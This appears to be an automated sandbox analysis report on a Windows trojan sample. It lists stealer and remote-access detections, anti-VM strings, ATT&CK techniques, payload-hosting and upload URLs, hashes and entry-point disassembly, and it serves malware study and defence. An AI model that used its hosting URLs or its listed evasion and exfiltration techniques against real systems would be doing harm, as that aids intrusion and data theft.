          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.E3XzKxHCCb.exe.94d318.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: E3XzKxHCCb.exe PID: 6756, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.E3XzKxHCCb.exe.94d318.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.E3XzKxHCCb.exe.94d318.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: E3XzKxHCCb.exe PID: 6756, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading
          1
          Process Injection
          1
          Software Packing
          OS Credential Dumping11
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory1
          System Information Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          E3XzKxHCCb.exe24%ReversingLabsWin32.Trojan.Generic
          E3XzKxHCCb.exe34%VirustotalBrowse
          E3XzKxHCCb.exe100%AviraTR/Dropper.VB.Gen
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          67.213.221.114%VirustotalBrowse
          http://exmple.com/Uploader.php4%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          172.67.187.200
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://paste.ee/r/tC4AKfalse
              high
              67.213.221.11trueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.comE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://paste.ee/r/tC4AKpE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com;E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    low
                    https://paste.ee/E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://exmple.com/Uploader.phpE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://analytics.paste.ee;E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        low
                        https://analytics.paste.eeE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://upx.sf.netAmcache.hve.3.drfalse
                            high
                            https://paste.ee/r/tC4AKD_E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://cdnjs.cloudflare.comE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://cdnjs.cloudflare.com;E3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  low
                                  https://secure.gravatar.comE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://themes.googleusercontent.comE3XzKxHCCb.exe, 00000000.00000002.1970824579.0000000000977000.00000004.00000020.00020000.00000000.sdmp, E3XzKxHCCb.exe, 00000000.00000002.1970824579.00000000009A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.67.187.200
                                      paste.eeUnited States
                                      13335CLOUDFLARENETUSfalse
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1429287
                                      Start date and time:2024-04-21 21:08:10 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 5s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:E3XzKxHCCb.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:7f77b237f660c6ef5aa674dbe4d3b38f.exe
                                      Detection:MAL
                                      Classification:mal84.troj.evad.winEXE@2/6@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      21:09:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      172.67.187.200EWW.vbsGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/gFlKP
                                      ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/JxxYu
                                      Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/Bpplq
                                      Name.vbsGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/0kkOm
                                      517209487.vbsGet hashmaliciousXWormBrowse
                                      • paste.ee/d/s0kJG
                                      screen_shots.vbsGet hashmaliciousXWormBrowse
                                      • paste.ee/d/GoCAw
                                      66432890.vbsGet hashmaliciousUnknownBrowse
                                      • paste.ee/d/D6Uw6
                                      96874650.vbsGet hashmaliciousXWormBrowse
                                      • paste.ee/d/yj4hE
                                      1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                      • paste.ee/d/QkK2f
                                      751652433.vbsGet hashmaliciousXWormBrowse
                                      • paste.ee/d/0BSaJ
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      paste.eeSecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                      • 172.67.187.200
                                      SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 172.67.187.200
                                      Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                      • 172.67.187.200
                                      eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                      • 172.67.187.200
                                      F723838674.vbsGet hashmaliciousUnknownBrowse
                                      • 104.21.84.67
                                      Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                      • 172.67.187.200
                                      F723838674.vbsGet hashmaliciousRemcosBrowse
                                      • 104.21.84.67
                                      DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                      • 104.21.84.67
                                      Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                      • 104.21.84.67
                                      SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                      • 104.21.84.67
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSSonic-Glyder.exeGet hashmaliciousStealitBrowse
                                      • 172.67.74.152
                                      SenPalia.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      UnderWars.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                      • 104.26.12.205
                                      SenPalia.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      UnderWars.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.7.115
                                      http://x-elon.fyiGet hashmaliciousGRQ ScamBrowse
                                      • 104.16.79.73
                                      2q45IEa3Ee.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                      • 104.26.5.15
                                      Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                      • 172.66.48.103
                                      WjikmGPcSC.exeGet hashmaliciousDCRatBrowse
                                      • 172.67.186.200
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                      • 172.67.187.200
                                      SecuriteInfo.com.Win64.MalwareX-gen.20388.25803.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.187.200
                                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                      • 172.67.187.200
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 172.67.187.200
                                      SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 172.67.187.200
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 172.67.187.200
                                      Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                      • 172.67.187.200
                                      SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.187.200
                                      SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.187.200
                                      z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      • 172.67.187.200
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0634462484760714
                                      Encrypted:false
                                      SSDEEP:192:cqbRtEq0kigMqjEzextzuiFwZ24IO8wIv:rRt6kigvj5tzuiFwY4IO8wIv
                                      MD5:E0D541941C859454F4087F9DDD014A57
                                      SHA1:CFEA46699E0ADD0D391AA3F4402F79090CF91456
                                      SHA-256:1A0185F14BC7D0D920850E6BB9FE0A0EB7A024DD84CDEA76FC05058C1D3101ED
                                      SHA-512:D0BBFB70671AB64FCE7B11DD5A0CDDBDD9C37B24DE77A4AA730AA89F3088840D5B6DE453E9804CFB94EACB5B8DA7808E13060278F9097E48A6DF6E4F1A0731E0
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.2.0.0.1.5.5.7.7.2.8.2.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.2.0.0.1.5.6.3.0.4.0.7.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.4.9.0.6.5.c.-.3.e.d.9.-.4.0.0.e.-.8.a.0.9.-.f.2.2.e.9.8.1.5.5.4.7.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.9.d.e.0.0.c.-.1.2.9.b.-.4.a.e.c.-.8.2.d.d.-.9.3.c.2.a.b.d.0.b.6.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.3.X.z.K.x.H.C.C.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.a.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.4.-.0.0.0.1.-.0.0.1.4.-.d.d.3.7.-.3.4.6.2.1.f.9.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.d.a.f.9.4.c.8.4.7.e.1.5.0.b.e.6.6.e.2.e.3.8.c.4.0.3.3.0.6.0.0.0.0.0.9.0.4.!.0.0.0.0.5.a.b.8.1.9.8.1.7.5.3.0.8.6.5.5.7.1.8.7.a.7.a.e.3.f.d.4.a.3.f.b.4.e.8.6.b.2.a.1.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Sun Apr 21 19:09:15 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):127668
                                      Entropy (8bit):2.350050274016057
                                      Encrypted:false
                                      SSDEEP:768:eN6awK2AhrUkvALHTQrbdYMgrpXun79l5K:eljhQkvALH8rbdYxpunT5K
                                      MD5:F080059D1A1FCA5A3F9C5E84047BD713
                                      SHA1:6D500B2AEB85A7747E371C447B36B39271A72F7F
                                      SHA-256:4D0A8C7F5B8648C815E6D25BF9BC0827935C3621D47E4B7B9D3C3C2C4FC5CD36
                                      SHA-512:84204E296A9601EFF10551EAB7387CAA754F83773B46FC0309C45B6C7D761F402635D2E24F5A1B58B04E0C578FCDA9D908FAF50747723457EE5DC39EC0A1B123
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... .......[d%f....................................d....M..........T.......8...........T............N...............$...........&..............................................................................eJ......L'......GenuineIntel............T.......d...Sd%f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8404
                                      Entropy (8bit):3.707687728186601
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJGn6H6Y9ASU9lCBtgmfUG4bLpDt89bP/sfWFm:R6lXJG6H6YqSU9lCbgmfLvPkf1
                                      MD5:43FF4F3EB1424E61F4EC48506049C9E9
                                      SHA1:52CB92F7F03B2C09CC44533907B325DE1D4CC5C4
                                      SHA-256:E5F79DFEB940A6121218B53A586034AB035EC16F0920D773FE13DEC06A740A7F
                                      SHA-512:0700D79AA60CEBD50EFD95582D106B2EB59BA0552EBE2C25EFB0F09EB1D338D8D8D643C37B528C77F9D0564B2B7D95E1503EE399173A48D2252DF7A13D87728D
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.5.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4704
                                      Entropy (8bit):4.525654254169258
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsdrJg77aI9kXWpW8VYWYm8M4JBVeTOqFa+q8fLjcOrKxWR6ud:uIjfdFI76m7VGJBV0eMLIEsWIud
                                      MD5:DF76343EDC1999F701A34E32479D9F58
                                      SHA1:0DB241C8EB61395F45DD80D0ED4EAB1A8ADFD8EF
                                      SHA-256:1F087366FF79201CCBDFBF247AAFC98DB1505EA65054A6848D62F979D90ED944
                                      SHA-512:A07DFF1379D8AF85DFCA97EA34EE6C54AC738B36FDB9C548B8F36F904D6CB5EC842669CB0C6FEBD851ACE36B2A13BB61BFC7903D7DFDE008B9946444E2546AE3
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="290051" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Users\user\Desktop\E3XzKxHCCb.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):589824
                                      Entropy (8bit):2.4309587446620924
                                      Encrypted:false
                                      SSDEEP:6144:t86wCpCfyFeIeSrMMSAtHX0M1YBRoJ/iRrefffI5:t8PCpCfyF1
                                      MD5:E0B8C91D2A1312F1A5F64C488F9F9D27
                                      SHA1:751AB6CB79AF075433414701B435A25C6BB0FE94
                                      SHA-256:1D2987A8B152EC69A9AB08BAF5AE48BFD4EF8218BAE2CB1CB921FFCD7AD733BB
                                      SHA-512:3343B7AC057DB9FB623EC1229B96DE67FA7003CF80D4438DCE0A4CC7075BBD7A87EA8EE7F3E6BFA09A94B06CDCA6EC445018DE028E192E21A809F08F073A6BCB
                                      Malicious:false
                                      Reputation:low
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.4659035218237895
                                      Encrypted:false
                                      SSDEEP:6144:dIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNZdwBCswSbI:OXD94+WlLZMM6YFH7+I
                                      MD5:5D245D6A7DDC3256127C26FDB16BE25D
                                      SHA1:872D94CA84169D6CF5EE05EDE23B0BE9662D900A
                                      SHA-256:0C372FCDE302FB085A2D1F6970B99A13EC5F4ED2AC1C87F5B2CCE409F50770F3
                                      SHA-512:210EA20A3775BC6E9D8FD8E850B889F4D580E34F4158B5234553DB8AD519723B36A3C6403996F6D43940FDEBE8A12FFF215BB756FBA14A0FCF1DF4036F276DC5
                                      Malicious:false
                                      Reputation:low
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ.,g.................................................................................................................................................................................................................................................................................................................................................:S........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):3.393330768066627
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:E3XzKxHCCb.exe
                                      File size:3'162'112 bytes
                                      MD5:7f77b237f660c6ef5aa674dbe4d3b38f
                                      SHA1:5ab81981753086557187a7ae3fd4a3fb4e86b2a1
                                      SHA256:b86c86fa3321ed97a4e5b0346dd482fcb910cbe8e996e46b125db3b5a58f790c
                                      SHA512:e07515616b5f14fe672ecdd507c180ea388d8022a6a72e13b0334bbfbd8a682468a9f2070713b3ffcb46f91305b777f91dcb356f2665b5cc30e452c66996535b
                                      SSDEEP:12288:lY8PCpCfyF1PeDEAX3jekDqEUO8IrO69ZKY2z+Kr8PCpCfyF1c:lo94EO3jekDpkz+6i
                                      TLSH:EDE5B55320104C27E07AD7343F24C72CAFC43EADA6A978FD63C5BE66BB369818951E15
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`...............................'......Rich....................PE..L....|.e..................&...................&...@........
                                      Icon Hash:1b676733391d2531
                                      Entrypoint:0x4016e8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x65BE7CDF [Sat Feb 3 17:50:23 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:b6bd2c758fd2124a56e081f0b8cb2b0c
                                      Instruction
                                      push 0061FB34h
                                      call 00007F92F84CA5D3h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      dec eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ebx+46h], bl
                                      pop edx
                                      scasd
                                      and al, E4h
                                      and byte ptr [ebp-57h], al
                                      jmp 00007F9376F8A57Ch
                                      adc ebp, dword ptr [ebx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      dec ebx
                                      inc ebp
                                      js 00007F92F84CA62Eh
                                      inc edi
                                      jne 00007F92F84CA613h
                                      xor dword ptr [ecx+36h], esi
                                      dec ecx
                                      jc 00007F92F84CA619h
                                      bound eax, dword ptr [ecx+58h]
                                      pop eax
                                      pop eax
                                      pop eax
                                      cmp byte ptr [eax], bh
                                      pop ecx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      dec esp
                                      xor dword ptr [eax], eax
                                      or esi, dword ptr [esi]
                                      pop ds
                                      xchg eax, esp
                                      jmp far 4F97h : 452C8D24h
                                      fst qword ptr [edi+7Eh]
                                      mov al, byte ptr [47FFA77Ah]
                                      jo 00007F92F84CA64Dh
                                      wait
                                      dec eax
                                      mov ecx, 3E4E91ECh
                                      push cs
                                      popfd
                                      dec ebx
                                      cmp cl, byte ptr [edi-53h]
                                      xor ebx, dword ptr [ecx-48EE309Ah]
                                      or al, 00h
                                      stosb
                                      add byte ptr [eax-2Dh], ah
                                      xchg eax, ebx
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
